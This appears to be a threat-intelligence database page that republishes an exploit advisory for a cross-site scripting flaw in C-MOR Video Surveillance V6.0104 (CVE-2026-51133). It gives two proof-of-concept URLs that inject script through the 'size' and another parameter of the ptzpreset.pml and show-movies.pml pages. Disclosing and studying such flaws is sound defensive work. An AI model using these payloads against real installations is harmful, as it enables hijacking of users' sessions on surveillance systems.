C-MOR 6.0104 - Cross-Site Scripting (XSS)
C-MOR 6.0104 - Cross-Site Scripting (XSS)
Indicators of Compromise
- exploit-code: # Exploit Title: C-MOR 6.0104 - Cross-Site Scripting (XSS) # Google Dork: N/A # Date: 2026-07-23 # Exploit Author: Samir Shamdin (Alb Cyber Guards) # Vendor Homepage: https://www.c-mor.com # Software Link: https://www.c-mor.com/ # Version: <= 6.0104 # Tested on: C-MOR Video Surveillance V6.0104 # CVE: CVE-2026-51133 # 1. Description: # A Cross-Site Scripting (XSS) vulnerability in za-internet GmbH C-MOR Video Surveillance <= V6.0104 # allows a remote attacker to execute arbitrary client-side code via the 'size' parameter in # the ptzpreset.pml component and the 'anyparam' in the show-movies.pml component. # 2. Proof of Concept (PoC): # The vulnerability can be triggered by enticing an authenticated user to click on the following crafted URLs: # PoC URL 1 (ptzpreset.pml): http://[TARGET]/ptzpreset.pml?cam=cam4&size=720c2usy%22%3E%3Cscript%3Ealert(%22AlbCyberGuards%22)%3C/script%3E # PoC URL 2 (show-movies.pml): http://[TARGET]/show-movies.pml?anyparam=%27);alert(%27XSS%27);//
C-MOR 6.0104 - Cross-Site Scripting (XSS)
Description
C-MOR 6.0104 - Cross-Site Scripting (XSS)
Affected software
Technical Details
- Cve
- CVE-2026-51133
- Version
- <= 6.0104
- Author
- Samir Shamdin
- Platform
- C-MOR Video Surveillance V6.0104
- Edb Id
- 52665
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for C-MOR 6.0104 - Cross-Site Scripting (XSS)
# Exploit Title: C-MOR 6.0104 - Cross-Site Scripting (XSS) # Google Dork: N/A # Date: 2026-07-23 # Exploit Author: Samir Shamdin (Alb Cyber Guards) # Vendor Homepage: https://www.c-mor.com # Software Link: https://www.c-mor.com/ # Version: <= 6.0104 # Tested on: C-MOR Video Surveillance V6.0104 # CVE: CVE-2026-51133 # 1. Description: # A Cross-Site Scripting (XSS) vulnerability in za-internet GmbH C-MOR Video Surveillance <= V6.0104 # allows a remote attacker to execute arbitrary client-side... (496 more characters)
Threat ID: 6a95bd28acd9273b49648ee0
Added to database: 08/31/2026, 17:43:04 UTC
Last updated: 08/31/2026, 17:49:04 UTC
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.